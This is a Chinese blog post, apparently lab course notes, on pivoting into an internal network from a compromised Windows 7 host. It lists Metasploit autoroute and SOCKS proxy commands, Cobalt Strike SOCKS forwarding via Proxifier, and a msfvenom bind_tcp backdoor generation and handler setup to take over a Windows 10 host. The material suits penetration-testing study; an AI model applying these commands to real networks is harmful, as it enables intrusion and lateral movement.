内网安全-代理技术-socket协议

小迪安全网络架构图:

背景:当前获取window7 出网主机的shell。

1.使用msf上线,查看路由

run autoroute -p

添加路由:

run post/multi/manage/autoroute

使用socks模块开启节点,作为流量跳板

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set srvport 1122

srvport => 1122

msf6 auxiliary(server/socks_proxy) > run

使用socket cap 进行代理

2.使用cs进行渗透测试

windwos7上线cs木马

点击代理转发选择socket

输入账户密码后,使用proifixer进行流量转发

配置为目标站点走socket5

3.使用cs进行windows10 上线cs

方案:创建木马将数据传递给本地4444端口

使用window7正向连接目标4444端口

cs配置正向监听器:

生成木马:

模拟执行木马,在windows7交互会话窗口:

connect 192.168.11.129 4444 即可上线

4.使用msf进行windows10 上线

生成正向连接后门:msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=2222 -f exe > bd.exe

放置windows10上运行

msf执行:

msf6 exploit(multi/handler) > use exploit/multi/handler

[*] Using configured payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf6 exploit(multi/handler) > set rhost 192.168.11.129

rhost => 192.168.11.129

msf6 exploit(multi/handler) > set lport 2222

lport => 2222

msf6 exploit(multi/handler) > run

相关推荐
WTT001128 分钟前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
群联云防护小杜3 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai3 小时前
HTTP协议及安全防范
网络协议·安全·http
黑客Jack4 小时前
防御 XSS 的七条原则
安全·web安全·xss
云云3215 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵
神一样的老师6 小时前
面向高精度网络的时间同步安全管理架构
网络·安全·架构
云云3217 小时前
云手机方案全解析
大数据·服务器·安全·智能手机·矩阵
云云3218 小时前
云手机能用来干什么?云手机在跨境电商领域的用途
服务器·线性代数·安全·智能手机·矩阵
云云3218 小时前
云手机方案总结
服务器·线性代数·安全·智能手机·矩阵
m0_748237058 小时前
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
前端·安全·web安全